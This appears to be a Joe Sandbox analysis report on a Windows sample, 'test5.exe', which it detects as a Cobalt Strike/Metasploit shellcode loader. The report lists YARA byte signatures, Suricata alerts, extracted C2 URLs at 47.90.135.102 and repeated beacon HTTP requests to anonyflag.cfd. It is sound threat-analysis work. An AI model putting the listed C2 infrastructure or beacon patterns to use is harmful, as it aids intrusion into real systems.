Edit tour

Windows Analysis Report
test5.exe

Overview

General Information

Sample name:	test5.exe
Analysis ID:	1581646
MD5:	ac76c4a995accb8a1d272cb76c4374ee
SHA1:	634fe41bf551c79cd1a3d9eb019da51d8c3803b5
SHA256:	30f23855d09b242339d3bdd20fc72ac30569be14701fe6a3080b284a15eeacf0
Tags:	CobaltStrikeexeuser-Disa_Tale
Infos:

Detection

CobaltStrike, Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected CobaltStrike

Yara detected Metasploit Payload

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to registers a callback to get notified when the system is suspended or resumed (often done by Miners)

Found Tor onion address

Potentially malicious time measurement code found

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

test5.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\test5.exe" MD5: AC76C4A995ACCB8A1D272CB76C4374EE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://7.90.135.102:443/2Vcr", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)\r\n"}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)\r\n", "Type": "Metasploit Download", "URL": "http://47.90.135.102/2Vcr"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x40:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0xac:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2eda7:$a39: %s as %s\%s: %d 0x3e159:$a41: beacon.x64.dll 0x2ffb7:$a46: %s (admin) 0x2ef07:$a48: %s%s: %s 0x2edd3:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2edff:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x30020:$a51: Content-Length: %d
00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1ad3b:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3e3c2:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16f81:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x17f91:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 8B 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 C1 F1 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF 50 0x17335:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30760:$a39: %s as %s\%s: %d 0x3fb12:$a41: beacon.x64.dll 0x31970:$a46: %s (admin) 0x308c0:$a48: %s%s: %s 0x3078c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x307b8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x319d9:$a51: Content-Length: %d
00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1b8f4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17b3a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x18b4a:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 8B 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 C1 F1 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF 50 0x17eee:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
Process Memory Space: test5.exe PID: 6608	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: test5.exe PID: 6608	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: test5.exe PID: 6608	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: test5.exe PID: 6608	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0xbf7dc:$a39: %s as %s\%s: %d 0x16eadc:$a39: %s as %s\%s: %d 0xc337d:$a41: beacon.x64.dll 0x17267d:$a41: beacon.x64.dll 0xbfb6a:$a46: %s (admin) 0xbfbe9:$a46: %s (admin) 0x16ee6a:$a46: %s (admin) 0x16eee9:$a46: %s (admin) 0xbf8ef:$a48: %s%s: %s 0x16ebef:$a48: %s%s: %s 0xbf7f6:$a50: %02d/%02d/%02d %02d:%02d:%02d 0xbf81f:$a50: %02d/%02d/%02d %02d:%02d:%02d 0xbf9a2:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x16eaf6:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x16eb1f:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x16eca2:$a50: %02d/%02d/%02d %02d:%02d:%02d 0xbfbbd:$a51: Content-Length: %d 0x16eebd:$a51: Content-Length: %d
Click to see the 17 entries

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T11:35:59.196677+0100	2028765	3	Unknown Traffic	192.168.2.4	49731	47.90.135.102	443	TCP

ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T11:35:59.929737+0100	2035442	1	A Network Trojan was detected	47.90.135.102	443	192.168.2.4	49731	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: CobaltStrike {"C2Server": "http://7.90.135.102:443/2Vcr", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)\r\n"}
Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)\r\n", "Type": "Metasploit Download", "URL": "http://47.90.135.102/2Vcr"}

Multi AV Scanner detection for submitted file

Source: test5.exe

Virustotal: Detection: 6%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.0% probability

Bitcoin Miner

Contains functionality to registers a callback to get notified when the system is suspended or resumed (often done by Miners)

Source: C:\Users\user\Desktop\test5.exe

Code function: 0_2_006B1040 LoadLibraryExW,

0_2_006B1040

Source: unknown	HTTPS traffic detected: 47.90.135.102:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.34.5:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: test5.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\test5.exe	Code function: 4x nop then test rbx, rbx	0_2_00702160
Source: C:\Users\user\Desktop\test5.exe	Code function: 4x nop then shr r10, 0Dh	0_2_006AA220
Source: C:\Users\user\Desktop\test5.exe	Code function: 4x nop then cmp rdx, 40h	0_2_0069D620
Source: C:\Users\user\Desktop\test5.exe	Code function: 4x nop then cmp rdx, rbx	0_2_0068BA60
Source: C:\Users\user\Desktop\test5.exe	Code function: 4x nop then lock or byte ptr [rdx], dil	0_2_0069DD60
Source: C:\Users\user\Desktop\test5.exe	Code function: 4x nop then shr r10, 0Dh	0_2_006A8D80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 47.90.135.102:443 -> 192.168.2.4:49731

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://7.90.135.102:443/2Vcr
Source: Malware configuration extractor	URLs: http://47.90.135.102/2Vcr

Found Tor onion address

Source: test5.exe, 00000000.00000000.1661554156.00000000007B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: m=nil base 390625uint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13netdnsdomaingophertelnetreturn.local.onionip+netrdtscppopcntX25519Commoncmd/goheaderAnswerLengthavx512rdrandrdseedfloat32float64CopySidFreeSidSleepExWSARecvWSASendconnectTrailersocks5hexpiresrefererrefreshGODEBUG:method:scheme:statushttp://consoleforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
Source: test5.exe	String found in binary or memory: m=nil base 390625uint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13netdnsdomaingophertelnetreturn.local.onionip+netrdtscppopcntX25519Commoncmd/goheaderAnswerLengthavx512rdrandrdseedfloat32float64CopySidFreeSidSleepExWSARecvWSASendconnectTrailersocks5hexpiresrefererrefreshGODEBUG:method:scheme:statushttp://consoleforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49731 -> 47.90.135.102:443

Source: global traffic	HTTP traffic detected: GET /2Vcr HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)Host: 47.90.135.102Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
